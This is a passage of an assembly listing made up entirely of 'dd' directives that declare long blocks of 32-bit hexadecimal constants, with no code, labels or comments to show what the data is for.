		dd 0DB8B98CBh, 7A08CADFh, 5166F1E2h, 400ACF71h,	6BADDAFEh
		dd 54E9C3B8h, 0CE6CDF45h, 0F9F584B4h, 7A366B3Eh, 28DC6EE7h
		dd 92268BA7h, 0FE0A67DEh, 0B38CDBA8h, 26598E6Fh, 0AA18ECCEh
		dd 3F156B83h, 0ABF5E8DCh, 617DE7EBh, 1527C131h,	0BF214067h
		dd 0AEF49293h, 332C68F5h, 0E7179523h, 84070FE7h, 5DF88C67h
		dd 7DFCB7CDh, 8CC31583h, 72CEB0B6h, 0C70ADC95h,	642F9A1Dh
		dd 0DFCAAE46h, 0DF4918B9h, 0D5551A87h, 79E56E39h, 0D36179FAh
		dd 9A54B90Eh, 2C5192BBh, 135712E1h, 0B4AC9DC5h,	0F3F6D7CEh
		dd 8C1B3BF4h, 0A8E0EC2Fh, 0C3F0D3A3h, 33C5C633h, 0CFD68966h
		dd 8B84F830h, 31C2CFC7h, 8090C3F1h, 0D44A62C7h,	0DDF1AAE8h
		dd 0C794DC32h, 27CD6A95h
		dd 3C668166h, 9B630BB8h, 0FE776FEBh, 3DD2E3DAh,	0BEDDD5F4h
		dd 75BB7C32h, 0D59420A7h, 4C99A501h, 8B68012Dh,	2C7C9BDh
		dd 879D0A5Bh, 0D493F78Eh, 0A873C154h, 8EC0A5EEh, 5AA4118Ch
		dd 0C31E5D74h, 0CE3E477Dh, 8453CAC1h, 2BBCB947h, 0ED340D6Ah
		dd 3DD65F9Fh, 0B5ABA0DAh, 132F167Fh, 5A9566DCh,	0CC14B152h
		dd 0B620CC01h, 3E7C8F9Ah, 4E2BF44Dh, 0F7A84550h, 6F7C97B3h
		dd 4577A2A7h, 0F93FB5ABh, 0E607D4B2h, 0D17ABC6Ch, 9320D193h
		dd 0B6E5E90Ch, 0B68AE857h, 0B3C29793h, 0A666E4EBh, 8288ED2Ah
		dd 0EBBCBEAAh, 0F2ACAAA9h, 0A2A38BE3h, 5594BD07h, 0D0F07775h
		dd 6AEAD012h, 0AB965D1Fh, 0EA168A74h, 8F1ABF49h, 0B78F8C9Fh
		dd 0ADABEC58h, 4982E2D8h, 0DD23E9CBh, 2FE38473h, 4627FE81h
		dd 41D662E3h, 212E9E65h, 95055E63h, 4B98BDE1h, 0C070B498h
		dd 590BA19Ch, 0FD643FA0h, 0B4503A46h, 25BBA91h,	0B4E66CAh
		dd 0D8783DE8h, 86D7846Dh, 0E10DD81Fh, 0F489572Ch, 7D6F8C4Dh
		dd 40C0A771h, 0EBC2E8AEh, 0BAB731FAh, 47B8625Ch, 3102D939h
		dd 75DE62CDh, 8DB4EB25h, 6C2F9BDEh, 0C0A68B77h,	0A95E088h
		dd 0BBAC2E81h, 6ACC19C4h, 0AC871582h, 24AFFDCAh, 0E2B38252h
		dd 0F3155B92h, 51EE4EE6h, 1B727473h, 4AE1BBFh, 579954FEh
		dd 79792F19h, 8CDEB9C2h, 23687C39h, 0FA1C0F55h,	0C45100C4h
		dd 999FCBF6h, 67E12D1Ch, 7570795Fh, 24B4D483h, 4EA1AD4Ch
		dd 6C3CE8B4h, 983C9CB4h, 1F7ED2CBh, 77EEC175h, 0CAD729A9h
		dd 26F8A6A7h, 80BFA80Ch, 59A56FE7h, 486A8B2Fh, 0D8F7D79Ah
		dd 0A654F288h, 29A2E65Dh, 0E4D58C51h, 607D5B65h, 0C62F398h
		dd 0F31FB228h, 1CC2665Fh, 0D320F3DFh, 2688D728h, 1B759155h
		dd 0C241FE60h, 4C812071h, 0DCEEF25Ch, 61873D7h,	0B82C3BCh
		dd 0A0D27DADh, 2A095FE3h, 4FC5D322h, 9BE64871h,	63A0BD32h
		dd 0EBE452B6h, 82EDD51Eh, 0F0B35C29h, 8D2D514Bh, 0D6117D8Dh
		dd 0E4C8DF2Eh, 7175DF69h, 8B2882C5h, 0AD916BC3h, 7EE62FABh
		dd 3859B474h, 8233FC35h, 0F4822F94h, 0F86FC12Eh, 0F8C3DED4h
		dd 0A2FEB2CCh, 0EBA57596h, 0B943E65h, 8B81C503h, 69DD4261h
		dd 0B9E1BF56h, 2B44EEA6h, 0E93AAD50h, 0AA8A8DD7h, 0E4EB6439h
		dd 50218A93h, 0CA8D5D5Dh, 75979EC9h, 4ABDA491h,	134CD61Ch
		dd 0A9372897h, 3205B691h, 0C5CF87Eh, 0DE343E02h, 6BCD6636h
		dd 72CE8E63h, 0E57273Dh, 4FC0A339h, 1B4D96AEh, 931259Bh
		dd 792B71A1h, 0DFA09336h, 37587EA5h, 8E4AD7B2h,	5CCDC1AAh
		dd 4B68F10Ah, 0F8CD2553h, 6AA39D14h, 7710646Bh,	27445BE7h
		dd 78273533h, 292A4433h, 3CDF2E8Ah, 3F54C04h, 7E1E1F97h
		dd 2C32D61Dh, 78DB5F2Fh, 0D7E1FAA0h, 0AAC05925h, 7F7735F7h
		dd 0D2536BADh, 19AB71EBh, 0EC6F0EA1h, 2E9509Ch,	96EF8CB6h
		dd 0DA4A5A2Fh, 3D7DA789h, 926B2858h, 7C3AEFE6h,	969D0FC4h
		dd 4CF98117h, 9469F07Dh, 7FAF3316h, 0C94E4C9Dh,	0B1A1956Fh
		dd 756E3632h, 2A17CBBh,	97B85355h, 8DDF8BD4h, 0F660F36h
		dd 0EBDA0793h, 3F519966h, 334D6691h, 196D9E6Eh,	0C439D952h
		dd 22E9FD6Ch, 2F5C57F5h, 0DD7EA9B4h, 39CE1152h,	1AFFAACDh
		dd 2C9D9E88h, 19569C50h, 80864991h, 9A8373D2h, 1D24AE52h
		dd 22A07CCFh, 1892DAECh, 68BDAEA6h, 0CC58A90Ah,	566A6B86h
		dd 5FE3A535h, 2E851E82h, 5A7454BDh, 3CE4E989h, 0F420B220h
		dd 9806258Eh, 2A07882Bh, 0F8CCFBFBh, 2B822E16h,	49E2FAB1h
		dd 5F37FA9Dh, 4A8D155Ch, 0AE7D75h, 87FBD0C6h, 12C8EF54h
		dd 1BF70177h, 8BF69578h, 82F55B44h, 0C60EF856h,	293A8BDDh
		dd 572AF5EAh, 5ECAA8DDh, 255577BAh, 640333E5h, 2A65C432h
		dd 3BEB02C7h, 0E5807341h, 0B3BBED72h, 95DB958Ch, 23C18DB8h
		dd 6DFD54DEh, 24B198B5h, 7C2FAD88h, 246D8F1Ch, 74653B9Ch
		dd 0D572CD28h, 5349383Dh, 2D27775Dh, 0EE2574E8h, 2B3281Eh
		dd 6AEDEDA7h, 75FB72BDh, 0E38519C8h, 0FAEDC8EBh, 0EB8E36BFh
		dd 3C962D51h, 6FB8AB6Eh, 54685E31h, 7B26FC65h, 7408DCFFh
		dd 0FB9B4F24h, 27790BE2h, 7314B58Ah, 7FAE717Dh,	0A27D2A14h
		dd 0C7D8A38Ah, 6EAC8246h, 0BE176E88h, 0DEFEA0B2h, 0E845054h
		dd 698F136Ah, 8B4DD0F3h, 7759952Eh, 0CB7A7779h,	258778DCh
		dd 7524B5DAh, 0B2B2A934h, 2EABF624h, 13B24ACEh,	6DEC08B4h
		dd 0CE55A868h, 442BE157h, 0C64E83E2h, 1E7AAEF9h, 86250EBAh
		dd 4CC76CE8h, 0A1F06BF0h, 68F5AAD8h, 9FACA15Dh,	0A8C01676h
		dd 0A4150AF1h, 0CE466A51h, 2D308CE2h, 77EAA160h, 3D636B46h
		dd 248925F8h, 0B5C22CCDh, 85BF7E22h, 29AA57CEh,	5DCADDB2h
		dd 0FD157762h, 89EACEC4h, 4635B911h, 765BB99h, 0A5FA519Bh
		dd 0FEACB6EDh, 27F92EA8h, 167BD49Eh, 2FA1A364h,	64764DFBh
		dd 6FF37AB4h, 9CCFC324h, 929730A8h, 58D7542Ah, 5F8381A4h
		dd 0D172E2D6h, 5D2B7EB3h, 42B68FE5h, 0FC77196h,	0AFF2F2F5h
		dd 9565DA3Dh, 0EE39C932h, 0F0CD03E7h, 6459C855h, 17C0976Dh
		dd 543F825h, 0A1D533D9h, 17903E2h, 7EED2991h, 3EABDABh
		dd 0B28DFF77h, 0D3DAD053h, 73AA2D09h, 72A0E651h, 0C151FA2Fh
		dd 8AA5FAF7h, 732DD6E7h, 0ECB32E82h, 6D421ABDh,	0D5E190FCh
		dd 4DEA9559h, 93555316h, 0EB85775Bh, 6898D298h,	0D6955BB1h
		dd 0AF95E0A1h, 34FCA9E4h, 0D47F49C3h, 0EAFE8653h, 8829A5C8h
		dd 88128164h, 956062Eh,	0DA2B55F9h, 0CC0C5EF8h,	2BB47E71h
		dd 1C7CF069h, 9BC36663h, 9B551B4Dh, 45CEB005h, 0A5EA031Bh
		dd 0D1CE387Ah, 7062D5FAh, 0AF45B6EDh, 7C32CBE9h, 6A08EA8h
		dd 0DBB8D049h, 4A750C3Eh, 4090D29h, 5B4195Fh, 0E8534082h
		dd 0CAD1C4C2h, 0D37FCCDEh, 0E092E1A9h, 92858199h, 7698DF78h
		dd 0C4347F1Ch, 0CDC4F4B7h, 0B1A7A7B9h, 19AB3AB4h, 3387883Ah
		dd 7F7B75B3h, 69E7F446h, 83832E64h, 0EA376D2Fh,	0BFDCC15Bh
		dd 0C284DA8Eh, 2171EABBh, 0D0AB3281h, 0A101004Dh, 0FB29BC56h
		dd 0EAA8192Bh, 0E98ABF1Eh, 69F10AB4h, 0ED858272h, 0DBB4383h
		dd 0F49CC4FFh, 0B2F6157Bh, 0E4B698CAh, 585DFC51h, 0C0B11649h
		dd 0D6F2A84Eh, 0A1CC6053h, 0B034B82Dh, 0A254F02Ah, 95442A2Ah
		dd 0C93F86F3h, 25E47D77h, 0D82F6460h, 874457h, 1247CFA7h
		dd 48D0E235h, 0C956D522h, 172682D1h, 0BF98C7B7h, 7C6B6F5Ch
		dd 64D4D4DAh, 4FBBAADDh, 0B3718429h, 8CE981CBh,	953E7D1Ah
		dd 0CEBC302Dh, 9B2612BBh, 5426AA2Fh, 5E2D8369h,	0A7786F1h
		dd 842BC257h, 0E9CCEE84h, 0A9EA0D09h, 7999CB84h, 5D5242F5h
		dd 588C3C5Ch, 5885649Fh, 6D32A68Bh, 453FC15Fh, 0D29F7C2Bh
		dd 7EE0EEF5h, 786F74A6h, 0F01FD0A5h, 9FC8FAE5h,	4C6763h
		dd 0B6FB7BBDh, 0E5F12D7Eh, 35288A53h, 0F733EFFBh, 68B63448h
		dd 606154F1h, 0EDF0263Bh, 0EFE0649Ah, 75075332h, 425DC5A5h
		dd 0DE6CFB99h, 88D3764Ch, 40CBF3B4h, 0B92BCC4Fh, 66E8FDF3h
		dd 0AB77EC06h, 0B287394Ah, 0B2B90E37h, 62D76E5Dh, 1A6542F9h
		dd 0BA9D4DB5h, 216CF8A2h, 4C51E717h, 2F54A88Bh,	0F0B59B44h
		dd 0C8D5D006h, 9A78E0C2h, 8454D1F0h, 0ED3B8AAFh, 3324D56Eh
		dd 2EFD744Ch, 0BD5B8EF4h, 0F23D7F8Fh, 0A997BF8Bh, 0AE4BB5BBh
		dd 8BA70D79h, 0B3A92DDEh, 7B606CDh, 0AF37C2D5h,	0D1D6CA60h
		dd 3F15F95Eh, 3AA6E8ECh, 4D216DEEh, 2BFC5917h, 0F482A8D0h
		dd 0FB44506Fh, 0BCFC5781h, 6B371DAh, 1DF14F9Ah,	26D13A36h
		dd 0A2355574h, 6DC3BE9Dh
		dd 0A7C2B2FAh, 0A835ED97h, 1C33AF73h, 0FCDD68F4h, 0E7A307Eh
		dd 58711BC6h, 0E7CBFBF5h, 0EC1CE78h, 3DC30D0Ah,	0A0FB1BFBh
		dd 307FC33h, 0A6DDC2C2h, 75D94322h, 0E47138F1h,	8885AE54h
		dd 0ADAD22F6h, 0B6B93313h, 0BBE6BC5Ah, 0FE4BC3BBh, 0F799238h
		dd 3640494Fh, 2D99165Dh, 962974F1h, 1112D575h, 56968B2h
		dd 0F7CCFF6Dh, 0D172A35Dh, 0E3E8DFBCh, 0BED9B25Eh, 0E57A16Eh
		dd 9E879766h, 0B4EAB25Bh, 4175BE2Fh, 76FFA3F2h,	0B7AAD51Bh
		dd 0B14F61Ch, 173BA636h, 0B47BD82Ah, 1512797Ah,	0C0FABE8Eh
		dd 0CBC10DABh, 0CFAFAD3Eh, 0BC1FD02Dh, 9D2DB9F8h, 1F543687h
		dd 0AF8A4A1Ch, 6A132F71h, 0C0F37CA6h, 4B9A9B03h, 0F67D4425h
		dd 0F7FBAB5Bh, 646259C3h, 0F826BF3Bh, 136468D0h, 0C1E46FDEh
		dd 1EFF4353h, 0B4F0436Dh, 47335B96h, 6237CDEBh,	3A91066h
		dd 45D9099Ch, 5A27A36Ch, 4571FAA4h, 7D5B310Ah, 0CB584B4Ch
		dd 3C28CF9Dh, 1C1E9463h, 0FF746F9h, 0AE7C13h, 0E0916E3Bh
		dd 1F4EF740h, 4A94AD17h, 2ABFFFCEh, 52841D2Dh, 0E9FB15AFh
		dd 0C5F8923Bh, 0DCF31D93h, 0F07D6EDEh, 5AF964CDh, 34867138h
		dd 797A4FB0h, 0ED52B817h, 3D8F212Ch, 23327D8h, 8D4EC4DEh
		dd 0B5B383E1h, 0C046DF28h, 5756E10Fh, 0B938EE84h, 1499CF61h
		dd 6A0DEC68h, 8F503521h, 814D685Ch, 31068779h, 742F662h
		dd 74F1F46Eh, 0A8CFF541h, 0D035DF3Ch, 9B5CC6A8h, 0C31350ECh
		dd 825B0F66h, 0CE2FB83Bh, 75F28FD0h, 0C3B6860Bh, 75E691FAh
		dd 0B6D5D516h, 0A1E9B9C1h, 52B0290Bh, 4B9F14DCh, 1B55F49Bh
		dd 6243950Dh, 7E63AB04h, 0BDCA6150h, 0B26969B6h, 0DDCBB7A0h
		dd 0C0F2790Ah, 0AE9B9D7Fh, 0A2F9BFD7h, 6753A270h, 47766936h
		dd 4799169Ch, 5BF92227h, 4BCDF7E3h, 2C55DAFDh, 1306CA6Bh
		dd 0CF2E8A15h, 3F2A2F2h, 0B2714C93h, 0FCD6EC74h, 0A7F5C0F0h
		dd 9FE2FC9Bh, 0AB121757h, 5B53548Ah, 3EA72FF1h,	4E3F6F08h
		dd 30FBCA9h, 43E68790h,	0A171CD5Ah, 36DE6CB8h, 78CE2B58h
		dd 0AF95A7E7h, 0E55984E7h, 97F3AEC7h, 0ED6DDA63h, 6FA3CA9Dh
		dd 3ACC46D0h, 20B92CEEh, 0AF8613D7h, 3394AE62h,	0A23D4370h
		dd 0CD02B85Dh, 7F588657h, 0FF94C26h, 19009FABh,	3F0E8DF6h
		dd 93B353A0h, 61928284h, 6D1BC1D2h, 3AB2A6F8h, 51AD5374h
		dd 5943D8A2h, 1BB8CDAAh, 0DB661F2Eh, 44636DA2h,	23EBB196h
		dd 139F90E8h, 0E046789Bh, 32E2852Bh, 9967B462h,	3F6DA74Bh
		dd 4D061D40h, 0BED1D701h, 0A34EAE6Eh, 0E76BC91Ah, 0F66EC66Ah
		dd 0E94DF3DAh, 63AA703Eh, 69EDD99Fh, 0C3F0DED9h, 4296068Bh
		dd 0B6463B7Eh, 0EA2DF247h, 1878B356h, 5D1F522Ch, 2FB69F6h
		dd 48931EFDh, 0F4BF235Eh, 0B4D0C9C7h, 0C0B52619h, 655BC680h
		dd 0B13D2EADh, 8A86D75Ah, 0B9550356h, 7B028611h, 2F819384h
		dd 8DEC536Fh, 8B37A9C2h, 0B63F21F8h, 0FBB74540h, 66E48F83h
		dd 0F268DA26h, 0BCEFAE9Ch, 8DB5873Ah, 0A51D18ECh, 0ABA6D6C4h
		dd 0BBBC81Ch, 5DAE112Eh, 0F18B7B12h, 0DA4BE1C3h, 0F1C4AB63h
		dd 0A8E31AC5h, 1470795Bh, 9A19A9D4h, 79E296B8h,	712F050Dh
		dd 37DBD337h, 0D017581Fh, 2CA87FA7h, 0AED06ED9h, 12DECE16h
		dd 964CC68Ch, 4A7932E9h, 3A546DD8h, 0FDD1D467h,	7A0CD303h
		dd 0E06819CEh, 687E4F7Bh, 94D5EB47h, 6D2BDC8Ch,	794EFDB5h
		dd 0DDD5D3F0h, 0C6283669h, 0ADE2A6E6h, 0AE068D94h, 7D66FCAEh
		dd 0E1F3A230h, 4DFF32D1h, 160E2985h, 346F61DFh,	96C836A9h
		dd 5F66A324h, 7CB39C4Fh, 11778713h, 632D501Ah, 0C91907CEh
		dd 16A88D3Eh, 0DCCB5C2Bh, 0CCE2E1F2h, 3E03442Bh, 71FB253Bh
		dd 24E4799Fh, 7A74FBE2h, 49C77D70h, 0EF8817C5h,	0A549D9D8h
		dd 0FA564310h, 8A0232ABh, 0B4AB69AAh, 0CA820CDh, 9B677F6Dh
		dd 0A5710559h, 8607799Eh, 61283365h, 1A6EDF2Dh,	4A887DE8h
		dd 0CD2096E5h, 0CE07BBB7h, 0F1679B6Ch, 0FAAADBA2h, 6D564ACCh
		dd 0B829EA0Ch, 2FDC8175h, 0BB54E3F1h, 1C6C7A5Bh, 0EDC77737h
		dd 0AA47BE3Dh, 0EE3F375Ch, 101B0A83h, 0B46D894h, 0EB956C37h
		dd 0E988DAE6h, 5F9D4426h, 0AB5B2070h, 0D9CBC8BFh, 0F1290EF8h
		dd 66B8F0ADh, 9E3D67B2h, 2155154Dh, 0C799B5E4h,	16958889h
		dd 0A45E2EB7h, 0EAA92A97h, 0E52D44A5h, 53490FC6h, 8A87AA69h
		dd 4854C00Dh, 0B877C623h, 8DE02756h, 2FA2926Eh,	0D5E2880Eh
		dd 0B02C0798h, 90FC9A92h, 3CBACCF4h, 92080CDAh,	6BF54EB3h
		dd 0D8D1B83Eh, 5A375526h, 0BE584DD0h, 875252EFh, 89BDD1DEh
		dd 26B918B8h, 25D6EC1h,	5C472EDDh, 0EB697004h, 9A582FFAh
		dd 0E99111E8h, 0F025A42Ah, 0D02C4AFEh, 99ECF7F0h, 6E2FA7C1h
		dd 7781DA3Eh, 70738A4Eh, 0F5F2E8DDh, 54DC354Dh,	423CA02Bh
		dd 0B2B92FFh, 0F988F630h, 0BB805925h, 0A26496A9h, 157C8BBAh
		dd 0B702FE6Fh, 7BE10EA4h, 0C8A72976h, 995C92FDh, 3811F179h
		dd 0BB3E6D07h, 0CCBEACACh, 5635BFE5h, 96617A49h, 16733CFBh
		dd 0BDB7B276h, 38A4C513h, 69F255F4h, 0CB236D7Dh, 0CED73454h
		dd 38D35EA5h, 0C15A5BFDh, 0A7AE0CAFh, 0C0564B2Bh, 0C4C18B53h
		dd 9DB43D8Bh, 823E758Ah, 0C0A17D52h, 6FD9BD40h,	5DC12DBBh
		dd 1D69B006h, 0FDC765DFh, 0AF564B24h, 0A939BF0Ah, 0DE40134Bh
		dd 250B83A3h, 0BD6EBEC3h, 0E2E25C0Ah, 55D3A90Ah, 0D91ED4D0h
		dd 0D6E5DD7Dh, 0D1B14B36h, 7BD48136h, 0EE840677h, 210D94A0h
		dd 6DF13323h, 0AEA13DBEh, 2C082D5Fh, 201ED3B9h,	0ECC03F1Bh
		dd 8FF4DCA1h, 0EB1B485Ch, 8F15BAC1h, 34DBE74h, 5EC06B47h
		dd 44E68F2Dh, 0FC6EF9ABh, 49E1B362h, 6DC4DD66h,	0AAA059FBh
		dd 0ABA59202h, 0F69C9D3Ch, 6B8694B1h, 0A3741A1Eh, 0E49AA340h
		dd 0ADC5EE70h, 0D84DC792h, 8787A8ADh, 0E6BA8F1Fh, 0F171972Eh
		dd 8E8AADE5h, 7B305FA5h, 242FF8Fh, 0E360E5CDh, 7EC4F11Bh
		dd 0F2AE79D0h, 0B769BB76h, 3486D82Eh, 0E9209D96h, 0F069CA5h
		dd 9271370Ch, 7B640FECh, 6D9415DEh, 0CE6C3F0Dh,	0EFD02AB9h
		dd 0AD503F07h, 0B475DDAh, 0CA5E7295h, 2451C497h, 0F8D5AC5Dh
		dd 0BE4F7C43h, 3B1421F0h, 9A4F4532h, 9CF25DC4h,	0C87B659h
		dd 177CBF8Fh, 0D34555EDh, 0DABA609h, 40B5562h, 0A0B64A86h
		dd 8C6264EAh, 87B4F03Bh, 0C057AEEBh, 0C0B5DBCEh, 0CFDDC94Bh
		dd 71933895h, 0A7BCE115h, 0AD7ED684h, 0DDE31324h, 8E823041h
		dd 64DE9958h, 47EC243Bh, 6CCC2CECh, 0E82098EFh,	5016275Ah
		dd 884F579h, 65DD6D2Bh,	0A87FB5FAh, 4051D28h, 0C02E49ECh
		dd 0B51F6618h, 37DBF300h, 674944AEh, 54286FCAh,	35D0DDE4h
		dd 1DC54D4Eh, 8A1D27CDh, 0AA2B3FEEh, 0E357C5CAh, 0A95D2A13h
		dd 9DAFC0FDh, 0C5FCFDACh, 48FA69F8h, 0BDD3ED1Fh, 2A90C1C4h
		dd 996BAA27h, 0B7E87F2Fh, 9ADC0B3Eh, 0B551F09Ch, 87515763h
		dd 48BEFDAFh, 8F157F64h, 5FE01D66h, 84E78ABEh, 3E67B0E2h
		dd 0BD8CBEFCh, 5B2E16C0h, 6B658BD6h, 12363B52h,	82B2995Fh
		dd 81CACA1Fh, 3474F2D4h, 0B6A2B0B7h, 0E4CE665Dh, 12FC1781h
		dd 51E069D4h, 87E21F14h, 0D40FC5D5h, 0CFBB22BAh, 3D62F821h
		dd 429D2438h, 0C3F19987h, 73A37A8Ah, 3A03D358h,	88EE2B38h
		dd 84CD65Bh, 0B6EC3BF8h, 0C12877C2h, 0D1063D6Ah, 0F1BEBE0Ah
		dd 0B25EDEB2h, 86961B12h, 568162CDh, 9E945140h,	0E6FBDD55h
		dd 0A0F655Dh, 0D6D4042Ch, 0BFA85AACh, 2125865Fh, 5020D60h
		dd 83462EBFh, 9B7AE552h, 0C5BAFE2Ah, 0AF19534Ah, 237F6C29h
		dd 54404918h, 3790EB06h
		dd 4A3B2F11h, 83B92593h, 1917A8Dh, 7A3FAF29h, 713DD6A5h
		dd 801624E9h, 27DC63CFh, 2B0F60F1h, 0F6576A5Fh,	65643227h
		dd 38116AEAh, 7048AD3Ah, 56B87D1h, 8CBD66B1h, 0F59155DFh
		dd 0C6CD2F45h, 89F44B12h, 0F7493716h, 0A26942DCh, 0A86A2A2Ah
		dd 711020ABh, 679F0C7Dh, 2885E50Eh, 0BFF7C47Ah,	0FD126EA3h
		dd 55A8A62Ah, 822B15D6h, 4D208ACh, 7394F0FCh, 47BFA4ABh
		dd 3FC5D539h, 0B4217CECh, 0AAA1A2A8h, 8BBF3FA4h, 32FF11D5h
		dd 0E92EC5F2h, 0A5F987FEh, 8C6CA832h, 6AB10B5h,	16B87EFDh
		dd 0F85DA57Bh, 4EB07967h, 231D447Eh, 9757A8C4h,	5D885FDBh
		dd 0D73C8103h, 9512505Eh, 0ACA55607h, 0CC3EAC69h, 0F9C9F850h
		dd 754D5A34h, 0BFB6B77h, 0F0299B8h, 0B7F19C8Fh,	3AB985FBh
		dd 0FF4118C7h, 7679CC5h, 8E31753h, 0BFDC7051h, 3CF7B0DDh
		dd 0AE0A0A54h, 51D58E16h, 0A3A10776h, 3894BB7Dh, 0B8150470h
		dd 0EEA79D49h, 8ED1F7F0h, 302C845Dh, 0CE0F2FA7h, 0B5187253h
		dd 665839DEh, 0D378DF65h, 0DB44A0A8h, 0D7F6F950h, 9A36A72Eh
		dd 10ADCA4Bh, 7C924AF3h, 7389461Dh, 0AF73B4EDh,	0A3A76027h
		dd 0CB48EC55h, 4CEC3768h, 0E49F8AB2h, 7E0370D4h, 797E9C0Fh
		dd 4587E4C2h, 0F52EFD5Bh, 0FF1B4B75h, 111A2F0Bh, 0D76F4950h
		dd 75CC9755h, 5CEA2538h, 8BEA736Dh, 5A6E5508h, 47BA01E2h
		dd 0B0FD4827h, 585DEA16h, 92ADCEA7h, 0DD1CFB17h, 68C5AE07h
		dd 0BA1FB564h, 5FFDFEDEh, 0CB814652h, 7F5DA2DAh, 3AD97BE3h
		dd 7FB7504Bh, 9029AD20h, 380759E4h, 6BAE570Fh, 450E33FFh
		dd 4D18C6A3h, 0C5835DBDh, 0B9DEC3F5h, 8D5FE910h, 0DB3655BDh
		dd 4D99B0CCh, 14D971D7h, 0DA6B95BEh, 0A516BE7Ch, 0FCD1CE54h
		dd 92580CA4h, 0FA867E1Fh, 7F654A3Ch, 35D6F429h,	0EA05D27Ch
		dd 25908A66h, 3FCFED7Eh, 0AE8D9C0Fh, 632DEBABh,	0D8EE275h
		dd 353132F4h, 731FFE47h, 0D4298030h, 5252C68Bh,	0D2E7F9A6h
		dd 5B4C8FF1h, 1366698h,	0FC6DD5Ch, 0AAE83F2Fh, 60E7D5B2h
		dd 0F0C4E441h, 2065ADh,	0AD69D7Eh, 412A3CE2h, 0F645F8Ch
		dd 70A1ADA3h, 0FA946A1Bh, 0A0DD0FB8h, 7E054D35h, 9647C697h
		dd 0C31E587Eh, 0EA55F827h, 3D83C858h, 0F9D96350h, 39E89A16h
		dd 88CAABEBh, 36401354h, 0DB46FD16h, 950758BAh,	4A3E50FCh
		dd 286FF596h, 0FCA2DA68h, 0D9BEB6BDh, 5D40C5BBh, 5AD68D54h
		dd 0B3B50360h, 0E777673h, 3F86689Dh, 0AD40B0E9h, 0D9BFA92Dh
		dd 0C73A539Dh, 0A088221h, 6B001CECh, 0A7E08EE7h, 6864638Ah
		dd 0CD547E55h, 0B5E9356Ah, 2B44CBBEh, 8A24A7F5h, 0EAF61E4Dh
		dd 72FCF190h, 0B8BDA8B8h, 6B33284Eh, 9540F879h,	0C5EA802Ch
		dd 1E7CB0D8h, 7905D29Ch, 6B413C08h, 223AEA35h, 0ADF31D8Eh
		dd 86E6E200h, 5DC73739h, 27DA197Dh, 0F9421294h,	0D364FF78h
		dd 0EBF81869h, 4069D023h, 759799D0h, 5C1FD506h,	0D1F446F5h
		dd 0C5AC5472h, 31E7BB34h, 0D0D587D7h, 0F3B68A11h, 0E481774Bh
		dd 4694DE5Fh, 0AD814159h, 0B9E4FD24h, 7D5424FAh, 2F6F0918h
		dd 7EABCC4Fh, 0D6776E57h, 0B787130Ah, 0DA471ECh, 8EAA912Fh
		dd 7F116FB4h, 0E65A7BD2h, 98B9C0FDh, 6D843FDEh,	7426BDC1h
		dd 0A87FE811h, 0AF766D1Bh, 5B87DFCCh, 3279D4F0h, 0C9A8D21Dh
		dd 259DC87Dh, 9BC1644Dh, 0C86DC4F9h, 0CB8C6F2h,	0F29C74D1h
		dd 0AB87184Bh, 71B788BAh, 17BB2B41h, 0B240CF42h, 4A2CA86Ah
		dd 4BAEB569h, 205CA338h, 2D35A6B1h, 2575B398h, 0D675D4C1h
		dd 0ECF20B49h, 136696CDh, 0F455AE85h, 2FDC8D45h, 0AB6A5D56h
		dd 15AE0578h, 0A31E9F96h, 2ED126FBh, 196FA85Ah,	0DA436DD4h
		dd 0E881AD9Ch, 54D6F15Bh, 4B8515F9h, 931C8AEEh,	0AE92BB7Ch
		dd 0BDB3AD7Eh, 6741D080h, 147C8FD7h, 68FE8231h,	0E05C0BD3h
		dd 0B650260Bh, 0AC9F51A6h, 979CF223h, 5A294662h, 0C451F878h
		dd 9CFFDAF8h, 500B5C43h, 0CC817536h, 0AD62A474h, 773223EBh
		dd 0B4524AD5h, 19B9D304h, 68AE9E85h, 5B9037D6h,	0BF7196Bh
		dd 0BE3A31F5h, 608B48AAh, 0B9BAD174h, 0AD8AF4Eh, 6F0D443Ah
		dd 0F6FBB6D8h, 0EC6CD06Ah, 617F0345h, 0F79825A9h, 0E455461Fh
		dd 0FEC89117h, 78676B74h, 0DC3C3ADFh, 0DA023CB2h, 0CFAAC350h
		dd 47358795h, 1FE2857Bh, 0B7887250h, 7B58143Ah,	0DACEB0E8h
		dd 0C41E2646h, 6F895C1Eh, 0D1C8904Bh, 5565F693h, 0CB92C2B1h
		dd 0B6C2B6F9h, 0CF6D7DF8h, 0E2E251E7h, 8AAE3BB0h, 1F18B142h
		dd 0CD0E5C93h, 20547785h, 0D03CE1DAh, 85FBBF8Ch, 8ADE7A91h
		dd 1F76EC96h, 508F2AD5h, 1455BB05h, 1DAB54B1h, 88E57D14h
		dd 0B015E42Fh, 0DD5EB197h, 0BC2C249h, 84E050A6h, 215EF6FEh
		dd 7FCE4BE1h, 76BEADC1h, 0BA4E3BBFh, 0CE3B9D2h,	0D6B7FE31h
		dd 30C2600Bh, 58D4A2B3h, 6C35663h, 0DF29BB34h, 0EAB1803h
		dd 0BB2E17DBh, 0E0F85C13h, 8790E0FAh, 0F761B97Ah, 6C739CF2h
		dd 5CCE5335h, 36C8B0FCh, 34146AD5h, 3859655Dh, 718E0F80h
		dd 0FD5F47C3h, 0B6A1B502h, 55FAF6FBh, 5CE9B645h, 0D82D1B0h
		dd 0F8A35D41h, 17C1F73Ah, 0E92EA108h, 60CF820h,	908ADF12h
		dd 884E31A9h, 0D6754BE7h, 264ED6F6h, 0A98894D6h, 17672ED8h
		dd 0CC39A2C5h, 6DB0F959h, 7137FBC0h, 5FB3FDB1h,	0A9CCEF2h
		dd 6C55DC0Eh, 8EF08B23h, 11386609h, 400AABB2h, 0A6553597h
		dd 9E24776Bh, 1BDA8294h, 329D245Fh, 0BEACB8C8h,	2EB1546Eh
		dd 0FF7A4F36h, 8A77BEF1h, 0CD92475Fh, 45F93CCh,	0AAA699BDh
		dd 0C98D17F1h, 43F1617Fh, 6AE0AEA1h, 28C2F47Bh,	115EB595h
		dd 0F51BB644h, 770A3C55h, 858877E1h, 58172942h,	6AC6E179h
		dd 2D50EB7Bh, 9C697C5Eh, 0C103EEE8h, 6BA22E20h,	0D860E562h
		dd 0F2FC99F1h, 3DECBC97h, 0EA861B69h, 0B250E9FDh, 0D6072945h
		dd 0FB6C744Ah, 0FCFE8F50h, 4EACB625h, 0DFFDBB75h, 0EE470611h
		dd 0AFFB622Ah, 259C2FBCh, 15A227CDh, 86E816EFh,	0C182918h
		dd 0BBDF177Eh, 0EA2D1290h, 0C0FB135Ah, 0C5F35A5Dh, 5E82F54Dh
